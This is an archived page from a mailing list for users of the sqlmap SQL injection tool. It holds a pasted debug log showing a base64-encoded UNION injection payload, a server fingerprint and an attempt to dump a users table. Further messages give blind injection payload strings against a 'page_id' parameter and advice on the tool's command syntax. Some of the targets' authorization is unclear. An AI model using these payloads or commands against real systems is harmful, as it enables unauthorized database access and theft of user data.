[00:51:49] [PAYLOAD] LTQ3MjInKSBVTklPTiBBTEwgU0VMRUNUIENIQVIoMTEzKStDSEFSKDEyMikrQ0hBUigxMTgpK0NIQVIoMTIxKStDSEFSKDExMykrKENBU0UgV0hFTiAoQ09OQ0FUKE5VTEwsTlVMTCk9Q09OQ0FUKE5VTEwsTlVMTCkpIFRIRU4gQ0hBUig0OSkgRUxTRSBDSEFSKDQ4KSBFTkQpK0NIQVIoMTEzKStDSEFSKDEwMSkrQ0hBUig5OSkrQ0hBUig5OSkrQ0hBUigxMTMpLDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LS0g
[00:51:50] [DEBUG] performed 1 queries in 0.57 seconds
[00:51:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[00:51:50] [INFO] fetching columns '最后登录时间' for table 'dd_users' in database 'vls3db4'
[00:51:50] [INFO] the SQL query used returns 1 entries
[00:51:50] [DEBUG] performed 0 queries in 0.02 seconds
[00:51:50] [INFO] fetching entries of column(s) '[最后登录时间]' for table 'dd_users' in database 'vls3db4'
[00:51:50] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:50] [INFO] fetching number of distinct values for column '[最后登录时间]'

Traceback (most recent call last):
  File "/root/sqlmap-0905/thirdparty/ansistrm/ansistrm.py", line 51, in emit
    message = stdoutencode(self.format(record))
  File "/root/sqlmap-0905/lib/core/convert.py", line 160, in stdoutencode
    retVal = data.encode(UNICODE_ENCODING)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe6 in position 688: ordinal not in range(128)
Logged from file sqlmap.py, line 125
Traceback (most recent call last):
  File "./sqlmap.py", line 95, in main
    start()
  File "/root/sqlmap-0905/lib/controller/controller.py", line 582, in start
    action()
  File "/root/sqlmap-0905/lib/controller/action.py", line 127, in action
    conf.dbmsHandler.dumpTable()
  File "/root/sqlmap-0905/plugins/generic/entries.py", line 155, in dumpTable
    retVal = pivotDumpTable(table, colList, blind=False)
  File "/root/sqlmap-0905/lib/utils/pivotdumptable.py", line 86, in pivotDumpTable
    value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
  File "/root/sqlmap-0905/lib/request/inject.py", line 360, in getValue
    value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
  File "/root/sqlmap-0905/lib/request/inject.py", line 312, in _goUnion
    output = unionUse(expression, unpack=unpack, dump=dump)
  File "/root/sqlmap-0905/lib/techniques/union/use.py", line 334, in unionUse
    output = _oneShotUnionUse(expression, unpack)
  File "/root/sqlmap-0905/lib/techniques/union/use.py", line 73, in _oneShotUnionUse
    page, headers = Request.queryPage(payload, content=True, raise404=False)
  File "/root/sqlmap-0905/lib/request/connect.py", line 641, in queryPage
    payload = function(payload=payload, headers=auxHeaders)
  File "/root/sqlmap-0905/tamper/base64encode.py", line 25, in tamper
    return base64.b64encode(payload) if payload else payload
  File "/usr/lib/python2.7/base64.py", line 53, in b64encode
    encoded = binascii.b2a_base64(s)[:-1]
UnicodeEncodeError: 'ascii' codec can't encode characters in position 147-152: ordinal not in range(128)

[*] shutting down at 00:51:50 |
From: Chris O. <chr...@gm...> - 2013-09-19 16:13:22
|
You have spaces across your URL...

On 19 September 2013 17:05, Edward Oursted <eou...@ya...> wrote:
> page_id' is not recognized as an internal or external command, operable program or batch file.
> How do I fix it?
>
> when I have used sqlmap.py-u site.com / index.php? id = 2 & page_id = 200 --dbs --dbms=MySQL |
From: Miroslav S. <mir...@gm...> - 2013-09-19 16:13:03
|
sqlmap.py -u "site.com / index.php? id = 2 & page_id = 200" --dbs --dbms=MySQL

bye

p.s. notice the double quotes

On Thu, Sep 19, 2013 at 6:05 PM, Edward Oursted <eou...@ya...> wrote:
> page_id' is not recognized as an internal or external command, operable program or batch file.
> How do I fix it?
>
> when I have used sqlmap.py-u site.com / index.php? id = 2 & page_id = 200 --dbs --dbms=MySQL

--
Miroslav Stampar
http://about.me/stamparm |
From: Edward O. <eou...@ya...> - 2013-09-19 16:08:28
|
page_id' is not recognized as an internal or external command, operable program or batch file.
How do I fix it?

when I have used sqlmap.py-u site.com / index.php? id = 2 & page_id = 200 --dbs --dbms=MySQL |
From: dark s. <dar...@go...> - 2013-09-19 10:54:46
|
To whom it may concern.

Hello there, today while I was testing a friend's webpage I got the error:
[WARNING] unknown charset 'it'

the meta tag of the site:

<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">

Kind Regards,

ds |
From: Amir A. <the...@ho...> - 2013-09-16 16:11:22
|
Actually seems my problems were due to the version of sqlmap with BackTrack - I got the latest version and it works as expected...

Date: Sat, 14 Sep 2013 08:52:21 +0200
Subject: Re: [sqlmap-users] Injecting into the body of a post
From: mir...@gm...
To: the...@ho...
CC: sql...@li...

Have you tried googling? There are literally hundreds of how tos.
http://bit.ly/18Zjw2i
Bye

On Sep 14, 2013 12:20 AM, "Amir A." <the...@ho...> wrote:

I've been trying to get SQL Map to attack the body of the post (one line of code with username, password in it) and I am unable to do so. Everything I read talks about attacking the URL but how can you attack something that's in the post body?

Great tool though, used it with burp suite!

Thanks! |
From: Miroslav S. <mir...@gm...> - 2013-09-16 06:58:24
|
Hi.

You haven't told what were the results of sqlmap running against that target. sqlmap is trying to use payloads like: validstring' and 'a'='a by default. From your description this looks like it could be a MsAccess.

Kind regards,
Miroslav Stampar

On Mon, Sep 16, 2013 at 4:53 AM, Rashmi Singh <ras...@gm...> wrote:
> I have spent ages to test website with help of sqlmap but no success, so I decided to post here for help with experts
>
> Website is vulnerable to blind sql injection, but I want sqlmap to help me but I don't know how to make it work by choosing correct sqlmap commandline options.
>
> I tell you whole picture of the injection.
>
> There are many post parameters but vulnerable parameter is only one, so below is the whole picture
>
> 1) blind sql injection is on https
>
> 2) vulnerable parameter is page_id POST param
>
> 3) blind injection work with following payload only.
>
> page_id=validstring' and 'a'='a
>
> With above payload page loads normally but if I use like below
>
> page_id=validstring' and 'a'='a'--
>
> Or
>
> page_id=validstring' and 'a'='a'#
>
> Or
>
> page_id=validstring' and 'a'='a'--+-
>
> Or
>
> page_id=validstring' and 'a'='a'%00
>
> Or
>
> page_id=validstring' and 'a'='a'/*
>
> Blind just does not work and page does not load normally.
>
> So I'm not sure how to terminate the query by myself with comments. Because no comment is working and I don't know what database is being used by the application.
>
> So that's why I want sqlmap to help me.
>
> Please help me with correct sqlmap commands with all correct options so I can make it work.
>
> Thank you very much

--
Miroslav Stampar
http://about.me/stamparm |
From: Rashmi S. <ras...@gm...> - 2013-09-16 02:53:18
|
I have spent ages to test website with help of sqlmap but no success, so I decided to post here for help with experts

Website is vulnerable to blind sql injection, but I want sqlmap to help me but I don't know how to make it work by choosing correct sqlmap commandline options.

I tell you whole picture of the injection.

There are many post parameters but vulnerable parameter is only one, so below is the whole picture

1) blind sql injection is on https

2) vulnerable parameter is page_id POST param

3) blind injection work with following payload only.

page_id=validstring' and 'a'='a

With above payload page loads normally but if I use like below

page_id=validstring' and 'a'='a'--

Or

page_id=validstring' and 'a'='a'#

Or

page_id=validstring' and 'a'='a'--+-

Or

page_id=validstring' and 'a'='a'%00

Or

page_id=validstring' and 'a'='a'/*

Blind just does not work and page does not load normally.

So I'm not sure how to terminate the query by myself with comments. Because no comment is working and I don't know what database is being used by the application.

So that's why I want sqlmap to help me.

Please help me with correct sqlmap commands with all correct options so I can make it work.

Thank you very much |